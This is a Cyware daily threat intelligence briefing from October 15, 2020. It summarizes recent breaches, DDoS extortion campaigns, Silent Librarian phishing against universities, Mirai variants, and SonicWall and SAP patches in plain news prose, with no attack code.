Cyware Daily Threat Intelligence, October 15, 2020

Share Blog post

The Iranian hacker group, Silent Librarian, has emerged from the shadow. Security researchers have discovered that the APT group is actively targeting universities across the world in a massive spear-phishing campaign. The group is using Cloudflare for most of its phishing hostname as part of its obscuring strategy. So far, the attack has impacted universities in Australia, the U.K, the U.S., Canada, Sweden, Germany, and the Netherlands.

In another development, several organizations have received DDoS extortion threats that include a payment of $230,000. To prove their threat legitimacy, the threat actors are sending a list of victim IPs to organizations.

Top Breaches Reported in the Last 24 Hours

Barnes & Noble confirms cyberattacks
Barnes & Noble has confirmed a cyberattack impacting Nook services. As a result, customers were unable to access their Nook libraries and their previous purchases. The bookseller has partially restored its systems. 

Panion leaks data
A Swedish software company, Panion, exposed over 2.5 million user records due to an unsecured Amazon AWS bucket. The exposed data included personal information, such as passwords, credit card data, and social security numbers. The bucket was publicly accessible for seven days before it was secured.

DDoS extortion threats
In a widespread DDoS extortion threat campaign, several companies across the globe have been threatened with DDoS attacks unless $230,000 is paid in ransom. One of the targeted organizations includes Travelex. To prove their threat legitimacy, the threat actors are also sending a list of victim IPs. 

ProctorTrack breached
ProctorTrack has disabled access to its service following an attack on its parent company, Verificient. To add further damages, the hackers defaced the site of Verificient with a video. 

Universities targeted
The notorious Silent Librarian threat actor group is back in action, targeting several universities in Australia, the U.K, the U.S., Canada, Sweden, Germany, and the Netherlands. The attack method includes the use of Cloudflare to hide the true location of its servers.         
   
Top Malware Reported in the Last 24 Hours

Mirai adds new exploits
Researchers have observed four new Mirai variants and the exploitation of two new command injection vulnerabilities in the wild. While the variants differ in origin and configuration, they all possess the necessary functionality to launch DDoS attacks. Variant four also includes an infection capability that is present in the other three variants. 

Magento phishing
Magento admin login phishing page was found on a compromised website using the file name wp-order.php. The page looked like a legitimate Magento 1.x login page to unsuspecting users but in the background, it loaded the page elements from a malicious domain ‘orderline[.]club.   
    
Top Vulnerabilities Reported in the Last 24 Hours

SonicWall fixes a flaw
SonicWall has issued patches for a critical stack-based buffer overflow vulnerability in the VPN portal. The flaw (CVE-2020-5135) can be abused to crash the device and prevent users from connecting to corporate resources. It can also open the door to remote code execution.

SAP issues updates
The updates issued by SAP for October 2020 include 15 security notes. Out of these, six are for previously patched flaws. One of the issues patched exists in CA Introscope Enterprise Manager. It has a CVSS score of 10.   

 Tags

mirai saga
sonicwall
slient librarian
barnes noble
panion
ddos extortion threat

Posted on: October 15, 2020

Get the Daily Threat Briefing delivered to your email!


More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.


Join Thousands of Other Cyware Followers!